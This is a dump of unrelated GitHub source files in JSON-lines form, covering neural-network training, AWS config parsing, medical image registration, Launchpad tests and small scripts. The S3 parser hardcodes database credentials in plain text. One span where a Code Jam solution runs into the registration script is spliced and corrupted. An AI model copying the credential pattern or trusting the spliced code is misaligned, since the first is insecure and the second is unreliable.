TestDistroSeriesTranslationsCopying(TestCaseWithFactory):\n\n layer = ZopelessDatabaseLayer\n\n def test_does_not_overwrite_existing_pofile(self):\n # Sometimes a POFile we're about to copy to a new distroseries\n # has already been created there due to message sharing. In\n # that case, the copying code leaves the existing POFile in\n # place and does not copy it. 
(Nor does it raise an error.)\n existing_series = self.factory.makeDistroSeries(name='existing')\n new_series = self.factory.makeDistroSeries(\n name='new', distribution=existing_series.distribution,\n previous_series=existing_series)\n template = self.factory.makePOTemplate(distroseries=existing_series)\n pofile = self.factory.makePOFile(potemplate=template)\n self.factory.makeCurrentTranslationMessage(\n language=pofile.language, potmsgset=self.factory.makePOTMsgSet(\n potemplate=template))\n\n # Sabotage the pouring code so that when it's about to hit the\n # POFile table, it returns to us and we can simulate a race\n # condition.\n pour_table = MultiTableCopy._pourTable\n\n def pour_or_stop_at_pofile(self, holding_table, table, *args,\n **kwargs):\n args = (self, holding_table, table) + args\n if table.lower() == \"pofile\":\n raise EarlyExit(*args, **kwargs)\n else:\n return pour_table(*args, **kwargs)\n\n MultiTableCopy._pourTable = pour_or_stop_at_pofile\n try:\n copy_active_translations(\n new_series, FakeTransaction(), DevNullLogger())\n except EarlyExit as e:\n pour_args = e.args\n pour_kwargs = e.kwargs\n finally:\n MultiTableCopy._pourTable = pour_table\n\n # Simulate another POFile being created for new_series while the\n # copier was working.\n new_template = new_series.getTranslationTemplateByName(template.name)\n new_pofile = self.factory.makePOFile(\n potemplate=new_template, language=pofile.language)\n\n # Now continue pouring the POFile table.\n pour_table(*pour_args, **pour_kwargs)\n\n # The POFile we just created in our race condition stays in\n # place. There is no error.\n resulting_pofile = new_template.getPOFileByLang(pofile.language.code)\n self.assertEqual(new_pofile, resulting_pofile)\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/translations/tests/test_distroseries_translations_copy.py","file_name":"test_distroseries_translations_copy.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23752803809","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nadaptive_NN.py: Function to train an adaptive dense feedforward NN with\n1 hidden layer.\nAdaptive: divide the training window in classes w.r.t. theta. Classes are chosen\ns.t. the change of the coefficients of the estimator by Fu is the same in each class.\nAccording to the performance of the NN per class in comparison to all model-based\nestimators and the linear NN put more weight on classes of comparatively\npoor performance. 
Extent of weight increase depends on deviation from the best\nestimator the NN is compared to.\n\nCreated on Tue Mar 9 16:23:48 2020\n\n@author: Franz Baumdicker, Klara Burger\n\"\"\"\n\nfrom tensorflow import keras\nimport numpy\nimport random\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom sklearn.metrics import mean_squared_error\nimport tensorflow.keras.backend as K\n\n\nimport sys_path\nfrom source.dynamic_loss_classes import loss_class\nfrom source.model_based_estimators import ItV, ItMSE, watterson\n\n\ndef nmse(y_true, y_pred, a, c):\n dim = len(c) - 1\n loss_classes = [[] for i in range(dim)]\n cond = [[] for i in range(dim)]\n loss = [[] for i in range(dim)]\n\n for i in range(0, dim):\n loss_classes[i] = a[i] * K.square((y_pred - y_true) / (y_true))\n cond[i] = K.less(y_true, c[i + 1]) & K.greater(y_true, c[i])\n\n loss[0] = K.switch(cond[0], loss_classes[0], loss_classes[1])\n for i in range(1, dim):\n loss[i] = K.switch(cond[i], loss_classes[i], loss[i - 1])\n\n return K.mean(loss[dim - 1], axis=-1)\n\n\ndef loss_wrapper(a, c):\n def nmse_loss(y_true, y_pred):\n return nmse(y_true, y_pred, a, c)\n\n return nmse_loss\n\n\ndef normalise_coeff(c, n):\n norm_c = numpy.zeros((n,))\n sum = 0\n for i in range(0, n):\n sum = sum + c[i]\n for i in range(0, n):\n norm_c[i] = numpy.round(c[i] / sum, 2)\n return norm_c\n\n\ndef train_adaptive_NN_1hl(\n n,\n num_hidden_nodes,\n num_class,\n num_NN,\n theta_min,\n theta_max,\n tol,\n max_it,\n sloppiness,\n sim_filepath,\n sim_filename,\n linear_NN_filepath,\n linear_NN_filename,\n save_filepath,\n):\n\n # check if input is reasonable\n\n # load training data\n sim_data = sim_filepath + sim_filename + \".npz\"\n input_train = numpy.load(sim_data)\n\n linear_NN = linear_NN_filepath + linear_NN_filename\n\n print(\"load data\")\n # convert training data into numpy arrays and then into pandas dataframes\n df1 = []\n df2 = []\n df3 = []\n df4 = []\n X_all = []\n Y_all = []\n for SFS, theta in zip(input_train[\"multi_SFS\"], input_train[\"multi_theta\"]):\n df1.append(SFS[0 : n - 1].tolist())\n df2.append(theta)\n df3 = numpy.array(df1)\n df4 = numpy.array(df2)\n X_all = pd.DataFrame(df3)\n Y_all = pd.DataFrame(df4)\n\n # splitting the training data into train(80%) and validation (20%) data\n X_train, X_valid, y_train, y_valid = train_test_split(\n X_all, Y_all, train_size=0.8, shuffle=True\n )\n\n X_val = numpy.array(X_valid)\n y_val = numpy.array(y_valid)\n\n X_train_NN, X_valid_NN, y_train_NN, y_valid_NN = train_test_split(\n X_train, y_train, train_size=0.8, shuffle=True\n )\n\n print(\"create classes for adaptive loss function (this step may take a few minutes)\")\n # create classes for loss function\n c = loss_class(n, num_class, theta_min, theta_max, tol)\n\n # divide samples from validation data set into classes\n X_valid_class = [[] for i in range(num_class)]\n y_valid_class = [[] for i in range(num_class)]\n for j in range(0, len(y_valid)):\n for k in range(0, num_class + 1):\n if y_val[j] >= c[k] and y_val[j] < c[k + 1]:\n X_valid_class[k].append(X_val[j, :])\n y_valid_class[k].append(y_val[j][0])\n\n # compute nmse for all estimators used for comparison\n Wat_est = [[] for i in range(num_class)]\n Wat_nmse = [[] for i in range(num_class)]\n ItV_est = [[] for i in range(num_class)]\n ItV_nmse = [[] for i in range(num_class)]\n ItMSE_est = [[] for i in range(num_class)]\n ItMSE_nmse = [[] for i in range(num_class)]\n Linear_NN_est = [[] for i in 
range(num_class)]\n Linear_NN_nmse = [[] for i in range(num_class)]\n\n for k in range(0, num_class):\n ItV_est[k].append(ItV(numpy.array(X_valid_class[k]), 1e-3))\n ItMSE_est[k].append(ItMSE(numpy.array(X_valid_class[k]), 1e-3))\n Linear_NN_est[k].append(\n keras.models.load_model(linear_NN, compile=False).predict(\n pd.DataFrame(X_valid_class[k])\n )\n )\n for j in range(len(y_valid_class[k])):\n Wat_est[k].append(watterson(X_valid_class[k][j]))\n ItV_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(ItV_est[k][0], numpy.sqrt(y_valid_class[k]).reshape(-1)),\n )\n )\n ItMSE_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(ItMSE_est[k][0], numpy.sqrt(y_valid_class[k]).reshape(-1)),\n )\n )\n Wat_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(Wat_est[k], numpy.sqrt(y_valid_class[k]).reshape(-1)),\n )\n )\n Linear_NN_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(\n Linear_NN_est[k][0].reshape(-1),\n numpy.sqrt(y_valid_class[k]).reshape(-1),\n ),\n )\n )\n\n coefficients = [[] for j in range(num_NN)]\n coeff_normalised = [[] for j in range(num_NN)]\n it = numpy.zeros((num_NN,))\n\n print(\"start training NN adaptively\")\n for j in range(1, num_NN + 1):\n # reset weights for NN\n model1 = keras.models.Sequential(\n [\n keras.layers.Dense(\n num_hidden_nodes,\n activation=\"relu\",\n use_bias=True,\n input_shape=(n - 1,),\n ),\n keras.layers.Dense(1, use_bias=False),\n ]\n )\n reset_weights = model1.get_weights()\n a = numpy.ones((num_class,))\n\n for i in range(0, max_it):\n check = 0\n NN = keras.models.Sequential(\n [\n keras.layers.Dense(\n num_hidden_nodes,\n activation=\"relu\",\n use_bias=True,\n input_shape=(n - 1,),\n ),\n keras.layers.Dense(1, use_bias=False),\n ]\n )\n if i == 0:\n NN.set_weights(reset_weights)\n\n custom_loss = loss_wrapper(a, c)\n NN.compile(loss=custom_loss, optimizer=\"adam\")\n\n callbacks = [\n EarlyStopping(monitor=\"val_loss\", patience=1, restore_best_weights=True)\n ]\n\n NN.fit(\n X_train_NN,\n y_train_NN,\n epochs=500,\n callbacks=callbacks,\n validation_data=(X_valid_NN, y_valid_NN),\n batch_size=64,\n )\n\n NN_est = [[] for j in range(num_class)]\n NN_nmse = [[] for j in range(num_class)]\n\n for k in range(0, num_class):\n NN_est[k].append(NN.predict(pd.DataFrame(X_valid_class[k])))\n NN_nmse[k].append(\n mean_squared_error(\n numpy.sqrt(y_valid_class[k]),\n numpy.divide(\n NN_est[k][0].reshape(-1),\n numpy.sqrt(y_valid_class[k]).reshape(-1),\n ),\n )\n )\n\n benchmark_min = [[] for j in range(num_class)]\n D = numpy.zeros((num_class,))\n NMSE_p = numpy.zeros((num_class,))\n for k in range(0, num_class):\n benchmark_min[k] = numpy.amin(\n [\n Wat_nmse[k][0],\n ItV_nmse[k][0],\n ItV_nmse[k][0],\n Linear_NN_nmse[k][0],\n ]\n )\n D[k] = NN_nmse[k][0] - benchmark_min[k]\n NMSE_p[k] = numpy.maximum(D[k] / benchmark_min[k], 0)\n\n M = numpy.amax(NMSE_p)\n if M == 0:\n print(\"iteration:\", i, \"M=0\")\n break\n\n for k in range(0, num_class):\n if NN_nmse[k] > (1 + sloppiness) * benchmark_min[k]:\n a[k] = a[k] + random.uniform(0.25, 0.5) * NMSE_p[k] / M\n check = check + 1\n\n if check == 0:\n break\n print(\"iteration:\", i)\n\n # if maximal number of epoches has been reached, signal it in the\n # following training statistics\n if i == max_it - 1:\n print(\n \"ERROR: maximal number of iterations for training has been reached\",\n j,\n \"! 
Start training again.\",\n )\n it[j - 1] = -1\n coefficients[j - 1].append(numpy.zeros((num_class,)))\n coeff_normalised[j - 1].append(numpy.zeros((num_class,)))\n print(\"coefficients:\", coefficients)\n print(\"normalised coefficients:\", coeff_normalised)\n print(\"iterations:\", it)\n\n # if training completed properly, safe training statistics and NN\n if check == 0 or M == 0:\n print(\"number of iterations for training:\", i + 1, \"NN Nr.:\", j)\n it[j - 1] = i + 1\n coefficients[j - 1].append(numpy.round(a, 2))\n coeff_normalised[j - 1].append(\n normalise_coeff(numpy.round(a, 2), num_class)\n )\n print(\"coefficients:\", coefficients)\n print(\"normalised coefficients:\", coeff_normalised)\n print(\"iterations:\", it)\n # save NN\n filename = (\n save_filepath\n + \"adaptive_NN_1hl_\"\n + str(num_hidden_nodes)\n + \"_\"\n + sim_filename\n + \"_\"\n + str(j)\n )\n NN.save(filename)\n print(\"NN\", j, \"has been trained SUCCESSFULLY!\")\n print(\"NN\", j, \"has been saved in:\", filename)\n","repo_name":"fbaumdicker/ML_in_pop_gen","sub_path":"source/adaptive_NN.py","file_name":"adaptive_NN.py","file_ext":"py","file_size_in_byte":10617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27533655239","text":"import json\nfrom pprint import pprint\nimport boto3\nimport pyodbc\nimport os\nimport gzip\nimport shutil\n\ns3 = boto3.client('s3')\nserver='SD-AE79-EF8E\\HCSQLSERVER1,2431'\ndatabase='hybrid_cloud'\nusername = 'testuser'\npassword ='TestingSQL@1234'\ndriver = '/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.2.so.0.1'\nbucket = \"parser-demo\"\nconnection = pyodbc.connect('DRIVER='+driver+';SERVER='+server+';PORT=2431;DATABASE='+database+';UID='+username+';PWD='+password)\ncursor = connection.cursor()\n\ndef lambda_handler():\n object_list = s3.list_objects(Bucket=bucket)\n for objects in object_list['Contents']:\n json_obj = objects['Key']\n target = json_obj.split('/')\n target_file = '-'.join(target)\n #length = len(target) - 1\n #target_obj = target[length]\n with open (target_file, 'wb') as data:\n s3.download_fileobj(bucket, json_obj, data)\n for f in os.listdir('.'):\n if f.endswith('.gz'):\n with gzip.open(f, 'rb') as f_in:\n file_name_json = f[0:-3]\n file_name = str(file_name_json) + \".json\" \n with open(file_name, 'wb') as f_out:\n shutil.copyfileobj(f_in, f_out)\n os.remove(f)\n for f in os.listdir('.'):\n with open (f, 'r') as json_file:\n if f.endswith('.json'):\n try:\n json_obj = json.load(json_file)\n json_str = json_obj['configurationItems']\n new_dict = {}\n for i in json_str:\n new_dict['resourceType'] = i['resourceType']\n new_dict['resourceId'] = i['resourceId']\n try:\n new_dict['arn'] = i['ARN']\n except Exception:\n new_dict['arn'] = None\n error = \"No ARN in file: %s\" %(f)\n print(error)\n new_dict['relatedEvents'] = i['relatedEvents'] if i['relatedEvents'] else None\n new_dict['relationships'] = i['relationships'] if i['relationships'] else None\n new_dict['supplementaryConfiguration'] = i['supplementaryConfiguration'] if i['supplementaryConfiguration'] else None\n new_dict['tags'] = i['tags'] if i['tags'] else None\n new_dict['configurationItemVersion'] = i['configurationItemVersion'] if i['configurationItemVersion'] else None\n new_dict['configurationItemCaptureTime'] = i['configurationItemCaptureTime']\n new_dict['awsAccountId'] = i['awsAccountId']\n new_dict['configurationItemStatus'] = i['configurationItemStatus']\n new_dict['awsRegion'] = i['awsRegion']\n 
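# optional field: a falsy hash is normalized to None, matching the other nullable attributes\n                            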
new_dict['configurationStateMd5Hash'] = i['configurationStateMd5Hash'] if i['configurationStateMd5Hash'] else None\n                            #print(new_dict)\n                            # 13 placeholders need 13 values; configurationItemCaptureTime was previously missing from the argument list\n                            cursor.execute(\"INSERT INTO Inventory_Complete(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\" , new_dict['resourceId'],\n                            new_dict['relatedEvents'], new_dict['relationships'], new_dict['supplementaryConfiguration'], new_dict['tags'], new_dict['configurationItemVersion'],\n                            new_dict['configurationItemCaptureTime'], new_dict['awsAccountId'], new_dict['configurationItemStatus'], new_dict['configurationStateMd5Hash'], new_dict['resourceType'], new_dict['arn'],\n                            new_dict['awsRegion']) \n                            #cursor.execute(command) \n                            #connection.commit()\n                            #connection.close()\n                            \n                    except Exception as e:\n                        error = \"Error on \" + str(f)\n                        print(error)\n\n\nlambda_handler()","repo_name":"the-indian-saint/AWS-Scripts","sub_path":"DynamoDB/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36041934244","text":"from zope.component import (\n    adapter,\n    getSiteManager,\n    )\nfrom zope.interface import (\n    implementer,\n    Interface,\n    )\nfrom zope.processlifetime import IDatabaseOpened\nfrom zope.publisher.interfaces import IRequest\nfrom zope.publisher.interfaces.browser import IBrowserRequest\nfrom zope.publisher.interfaces.http import IHTTPRequest\nfrom zope.traversing.interfaces import ITraversable\n\n\n@implementer(Interface)\ndef adapter_mask(*args):\n    return None\n\n\n@adapter(IDatabaseOpened)\ndef handle_process_start(ev):\n    \"\"\"Post-process ZCML configuration.\n\n    Normal configuration should happen in ZCML (or whatever our Zope\n    configuration standard might become in the future). The only kind\n    of configuration that should happen here is automated fix-up\n    configuration. 
Code below should call functions, each of which explains\n why it cannot be performed in ZCML.\n\n Also see the lp_sitecustomize module for initialization that is done when\n Python first starts.\n \"\"\"\n fix_up_namespace_traversers()\n\n\ndef fix_up_namespace_traversers():\n \"\"\"Block namespace traversers from being found as normal views.\n\n See bug 589010.\n\n This is done in a function rather than in ZCML because automation is\n appropriate: there has already been an explicit registration of the\n namespace, and having to also say \"please don't assume it is a view\"\n is a DRY violation that we can avoid.\n \"\"\"\n sm = getSiteManager()\n info = 'see %s.fix_up_namespace_traversers' % (__name__,)\n namespace_factories = sm.adapters.lookupAll(\n (Interface, IBrowserRequest), ITraversable)\n for request_iface in (Interface, IRequest, IHTTPRequest, IBrowserRequest):\n for name, factory in namespace_factories:\n current = sm.adapters.lookup(\n (Interface, request_iface), Interface, name)\n if current is factory:\n sm.registerAdapter(\n adapter_mask,\n required=(Interface, request_iface), name=name, info=info)\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/services/webapp/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23558712301","text":"# input() reads a string with a line of input, stripping the '\\n' (newline) at the end.\r\n# This is all you need for most Google Code Jam problems.\r\ncases = int(input()) # read a line with a single integer\r\nmax_num = []\r\nfor i in range(1, cases + 1):\r\n max_num.append(int(input())) \r\n \r\n \r\n \r\n \r\ndef check(num):\r\n\tlst = str(num)\r\n\tfor x in range(1,len(lst)):\r\n\t\tif (int(lst[x]) < int(lst[x-1]))\t:\r\n\t\t\treturn True\r\n\treturn False\r\n\t\t \r\n \r\n \r\nsolutions = []\r\nfor num in max_num:\r\n\twhile(check(num)):\r\n\t\tdigits = str(num)\r\n\t\tif(digits[-1] == \"0\"):\r\n\t\t\tnum -= 1\r\n\t\tfor x in range(1,len(digits)):\r\n\t\t\tif (digits[x] Iteration {epoch:3} Energy: {loss.item():.3f}')\n\n loss.backward() # Compute the gradients\n optimizer.step() #\n\n if epoch % 2 == 0:\n with torch.no_grad():\n U, s, V = model.affine.clone().svd()\n model.affine.data = torch.mm(U, V.transpose(1, 0))\n\n # if epoch >= 2:\n if epoch > 10 and np.mean(energy[-10:]) - energy[-1] < 0.01:\n break\n\n itr_affine = torch.eye(3, device=device, dtype=torch.float32)\n itr_affine[0:2, 0:2] = model.affine\n itr_affine[0:2, 2] = model.translation\n\n opt_affine = torch.matmul(itr_affine.detach(), affine)\n\n # Create a new resample filter to make sure everything works\n optaff_filter = so.AffineTransform.Create(affine=opt_affine, device=device)\n\n aff_histopathology = optaff_filter(histology, blockface)\n\n return aff_histopathology, opt_affine\n\n\ndef deformable_histology_to_blockface(histology, blockface, scales, steps, gauss=True, mic=None):\n deformation = blockface.clone()\n deformation.set_to_identity_lut_()\n deformation_list = []\n orig_histology = histology.clone()\n\n # Create a grid composer\n composer = so.ComposeGrids(device=device, dtype=torch.float32, padding_mode='border')\n\n if gauss:\n # Need do some blurring for the mic\n gauss = so.Gaussian.Create(\n channels=1,\n kernel_size=50,\n sigma=20,\n device=device\n )\n #\n histology = gauss(histology)\n\n # Steps\n for s in scales:\n\n temp_mic = histology.clone()\n temp_block 
= blockface.clone()\n\n scale_source = temp_mic.set_size(histology.size // s, inplace=False)\n scale_target = temp_block.set_size(blockface.size // s, inplace=False)\n deformation = deformation.set_size(blockface.size // s, inplace=False)\n\n # Apply the deformation to the source image\n scale_source = so.ApplyGrid(deformation)(scale_source)\n\n operator = so.FluidKernel.Create(\n scale_target,\n device=device,\n alpha=1.0,\n beta=0.0,\n gamma=0.001,\n )\n\n similarity = so.L2Similarity.Create(dim=2, device=device)\n\n match = st.IterativeMatch.Create(\n source=scale_source,\n target=scale_target,\n similarity=similarity,\n operator=operator,\n device=device,\n step_size=steps[scales.index(s)],\n incompressible=False\n )\n\n energy = [match.initial_energy]\n print(f'Iteration: 0 Energy: {match.initial_energy}')\n\n for i in range(1, 500):\n energy.append(match.step())\n print(f'Iteration: {i} Energy: {energy[-1]}')\n\n if i > 10 and np.mean(energy[-10:]) - energy[-1] < 0.001:\n break\n\n deformation = match.get_field()\n deformation_list.append(deformation.clone().set_size(histology.size, inplace=False))\n deformation = composer(deformation_list[::-1])\n\n # Compose the deformation fields\n source_def = so.ApplyGrid(deformation, device=device)(orig_histology, deformation)\n\n return source_def, deformation\n\n\ndef register_histopathology_to_blockface(rabbit, block, img_num, bf_slice):\n\n blockface_dir = f'/hdscratch/ucair/{rabbit}/blockface/{block}/'\n histology_dir = f'/hdscratch/ucair/{rabbit}/microscopic/{block}/'\n out_dir = f'{histology_dir}deformations/'\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\n # if os.path.exists(f'{out_dir}/img_{img_num}_deformation_to_blockface.mhd'):\n # return\n\n # Load and make the histopathology segmentation\n segs = []\n segs += [io.LoadITKFile(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_healthy_tissue.nrrd',\n device=device)]\n if os.path.exists(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_ablated_region.nrrd'):\n segs += [io.LoadITKFile(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_ablated_region.nrrd',\n device=device)]\n if os.path.exists(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_uncertain_region.nrrd'):\n segs += [io.LoadITKFile(f'{histology_dir}segmentations/IMG_{img_num}/img_{img_num}_uncertain_region.nrrd',\n device=device)]\n\n histology_seg = core.StructuredGrid.FromGrid(segs[0], channels=1)\n for seg in segs:\n histology_seg += seg\n\n try:\n blockface_seg = io.LoadITKFile(f'{blockface_dir}volumes/raw/hd_labels/{block}_hdlabel_volume.nrrd',\n device=device)\n except:\n blockface_seg = io.LoadITKFile(f'{blockface_dir}volumes/raw/segmentation_volume.nrrd',\n device=device)\n\n # # Load the surface slice and get the difference\n # blockface_surf = io.LoadITKFile(f'{blockface_dir}volumes/raw/surface/IMG_{bf_slice:03d}_surface.mhd',\n # device=device)\n #\n # blockface_surf_p1 = io.LoadITKFile(f'{blockface_dir}volumes/raw/surface/IMG_{bf_slice + 1:03d}_surface.mhd',\n # device=device)\n #\n # diff = (blockface_surf - blockface_surf_p1).data[2]\n #\n # diff = (diff - diff.min()) / (diff.max() - diff.min())\n\n # Extract the slice\n blockface_seg = blockface_seg.extract_slice(bf_slice - 1, dim=0)\n\n aff_seg, affine = solve_affine(histology_seg, blockface_seg, img_num, out_dir=out_dir, device=device)\n np.savetxt(f'{out_dir}/img_{img_num}_affine_to_blockface.txt', affine.cpu().numpy())\n\n #### Apply the affine to the image\n mic_file = 
f'{histology_dir}hdf5/{block}_img{img_num}_image.hdf5'\n\n meta_dict = {}\n with h5py.File(mic_file, 'r') as f:\n mic = f['RawImage/ImageData'][:, ::10, ::10]\n for key in f['RawImage'].attrs:\n meta_dict[key] = f['RawImage'].attrs[key]\n\n mic = core.StructuredGrid(\n mic.shape[1:],\n tensor=torch.tensor(mic, dtype=torch.float32, device=device),\n spacing=torch.tensor([10.0, 10.0], dtype=torch.float32, device=device),\n origin=histology_seg.origin,\n device=device,\n dtype=torch.float32,\n channels=3\n )\n\n mic = (mic - mic.min()) / (mic.max() - mic.min())\n aff_mic = so.AffineTransform.Create(affine=affine)(mic, blockface_seg)\n # plt.figure()\n # plt.imshow(aff_mic.data.permute(1,2,0).cpu())\n # plt.axis('off')\n # plt.gca().invert_yaxis()\n # plt.savefig(f'/home/sci/blakez/ucair/Animations/Scrolls/Mic/Images/{blockface_slice}_image.png', dpi=500, bbox_inches='tight', pad_inches=0)\n\n def_histology, deformation = deformable_histology_to_blockface(\n aff_seg,\n blockface_seg,\n steps=[0.01, 0.005],\n scales=[4, 1],\n gauss=True, \n mic=aff_mic\n )\n\n # Save out the deformation\n io.SaveITKFile(deformation, f'{out_dir}/img_{img_num}_deformation_to_blockface.mhd')\n\n\nif __name__ == '__main__':\n rabbit = '18_060'\n block_list = sorted(glob.glob(f'/hdscratch/ucair/{rabbit}/microscopic/block*'))\n for block_path in block_list[5:7]:\n block = block_path.split('/')[-1]\n raw_images = glob.glob(f'/hdscratch/ucair/{rabbit}/microscopic/{block}/raw/*_image.tif')\n raw_images = sorted(glob.glob(f'/hdscratch/ucair/{rabbit}/microscopic/{block}/raw/*_image.jpg') + raw_images)\n\n cur_nums = [int(x.split('/')[-1].split('_')[1]) for x in raw_images]\n\n for im in cur_nums:\n img = f'{im:03d}'\n blockface_slice = im\n register_histopathology_to_blockface(rabbit, block, img, blockface_slice)\n # apply_deformation_to_histology(rabbit, block, img)\n","repo_name":"blakezim/MR_Hist","sub_path":"Histology/Histopathology_to_Blockface.py","file_name":"Histopathology_to_Blockface.py","file_ext":"py","file_size_in_byte":11205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72907304835","text":"import os\r\nimport matplotlib.image as image\r\n\r\n# path_import = r'V:\\Scratch\\hi\\my\\Datenauswahl'\r\npath_import = r'D:\\MA_Liang\\Data_Analysis\\Decoating Number\\RTCR25\\Once Decoating'\r\n\r\n#runtime settings \r\nn_resize = 1 #specfify resolution (ideally: n_resize = 1), use only every n-th row and column to reduce runtime, typical value for good results at a reasonable runtime: 5\r\nroh_data_filter_mat_size = 3\r\nhole_search_filter_mat_size = 5\r\npath_export = path_import + r'\\Results' + str(n_resize)\r\ntry:\r\n os.mkdir(path_export) \r\n print(\"Directory \" , path_export, \" created \") \r\nexcept FileExistsError:\r\n print(\"Directory \" , path_export, \" already exists\")\r\n\r\n#figure settings\r\nshow = True #specify if figures should be shown, disable for large datsets to save RAM\r\nshow_num_with_indentations = True #specify whether indentations should be represented with number\r\nfile_format = 'pdf' #select in which file format the files should be saved, e.g. 
'pdf', 'svg', 'png', 'jpg'\r\n\r\n#%% start to analyse all CSV-files in given import-directory\r\nimport Main\r\n\r\nfolder_name = path_import.split('/')[len(path_import.split('/'))-2]\r\n\r\nlist_final = []\r\n\r\n# for loop to call file after file\r\nfor root, dirs, files in os.walk(path_import):\r\n for name in files:\r\n if os.path.splitext(name)[-1] == '.csv' and 'Results' not in name and 'characteristics' not in name:\r\n \r\n path_to_file = os.path.join(root, name)\r\n filename = os.path.join(name).split('.csv')[0]\r\n print('Dateiname: ' + filename)\r\n photo_path = path_to_file.replace('_Height.csv', '.png')\r\n print('photo path is:', photo_path)\r\n photo = image.imread(photo_path) # resize photo as the same as roh data-frame: easier for figure.f to plot photo as background\r\n \r\n #start main program\r\n res_depth, res_diameter, df_output, std_depth, std_diameter, df_error_w, df_weights, info, df, df_weights_filt, df_hole_w_2, df_controll, y, data_size, run_time_wls, run_time_hole_numbering, run_time_geometric_center, run_time_total = Main.main(filename, path_to_file, path_export, n_resize, show, file_format, photo, roh_data_filter_mat_size, hole_search_filter_mat_size, show_num_with_indentations)\r\n \r\n #save results in list\r\n list_final.append([filename, res_depth, res_diameter, df_output, std_depth, std_diameter, data_size, run_time_wls, run_time_hole_numbering, run_time_geometric_center, run_time_total])\r\n \r\n print('Tiefe: ', res_depth)\r\n print('Durchmesser: ', res_diameter)\r\n print('')\r\n#%% Barplot\r\nimport barplot\r\nbarplot.barplot(path_export,list_final,file_format)\r\n\r\n#%% export\r\nimport export\r\nexport.export(path_export, list_final, n_resize)\r\n#export.exportlumentum(path_export, list_final)\r\n","repo_name":"Roman315/MA_Liang","sub_path":"Controll.py","file_name":"Controll.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40163078872","text":"import pandas as pd\nimport numpy as np\nfrom pandas import ExcelWriter\nfrom datetime import datetime, timedelta\nimport tkinter\nfrom tkinter import filedialog\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as dates\n\nstart_date = datetime(2022, 6, 1)\nend_date = datetime(2023, 3, 31)\nsheet = \"HOP\"\nchart_folder = \"/Users/mikephillips/My Drive/Cottonwood/C. Equity/3. 
Work Product/Leasing Charts/\"\n\nprint(\"Please select the key stats vacancies file that you want to analyze.\")\nroot = tkinter.Tk()\nroot.update()\nkey_stats_vacancies_file_path = filedialog.askopenfilename()\nkey_stats_vacancies_xls = pd.ExcelFile(key_stats_vacancies_file_path)\nkey_stats_vacancies_df = pd.read_excel(key_stats_vacancies_xls, \"Sheet1\")\n\nfor unit_type in key_stats_vacancies_df['Unit Type'].unique():\n\n print(\"Unit Type: \" + unit_type)\n current_key_stats = key_stats_vacancies_df[(key_stats_vacancies_df[\"Unit Type\"] == unit_type) &\n (key_stats_vacancies_df[\"End Vacant Date\"] >= start_date) &\n (key_stats_vacancies_df[\"Prior Rent\"] > 0) &\n (key_stats_vacancies_df[\"Next Rent\"] > 0)]\n\n x = current_key_stats[\"End Vacant Date\"].values\n y = current_key_stats[\"Adjusted Uplift\"].values\n plt.figure(figsize=(10, 8))\n plt.subplots_adjust(top=0.9, bottom=0.25, left=0.2)\n ax = plt.axes()\n ax.scatter(x, y)\n ax.set_title(sheet + \" - \" + unit_type + \"\\n\", fontsize=10)\n ax.set_ylabel('Uplifts\\n', fontsize=5)\n ax.set_xlabel('\\nLease Dates', fontsize=5)\n ax.tick_params(axis='both', labelsize=5)\n ax.tick_params('x', labelrotation=30)\n ax.set_xlim(start_date, end_date)\n\n # Get values for the trend line analysis\n if len(x) > 1:\n x_num = dates.date2num(list(x))\n trend = np.polyfit(x_num, list(y), 1)\n fit = np.poly1d(trend)\n plt.plot(list(x), fit(list(x_num)), \"r--\")\n\n plt.savefig(chart_folder + sheet + \" - Uplifts - \" + unit_type + \".png\")\n plt.close()\n","repo_name":"phillips199/multifamily","sub_path":"lease_uplifts.py","file_name":"lease_uplifts.py","file_ext":"py","file_size_in_byte":1971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11513080476","text":"#Ler uma medida em metros e devolver em centímetros e milímetros\r\nmedida = float(input(\"Digite o número de metros a serem convertidos: \"));\r\nkm = (medida/1000);\r\nhm = (medida/100);\r\ndam= (medida/10);\r\ndm = (medida * 10);\r\ncm = (medida * 100);\r\nmm = (medida * 1000);\r\nprint(f\"Calculando...\\n{medida} metros equivalem a:\\n{km} km \\n{hm} hm \\n{dam} dam\");\r\nprint(f\"{dm} dm \\n{cm:.0f} cm \\n{mm:.0f} mm\");\r\n#.0f formata o número com nenhuma casa 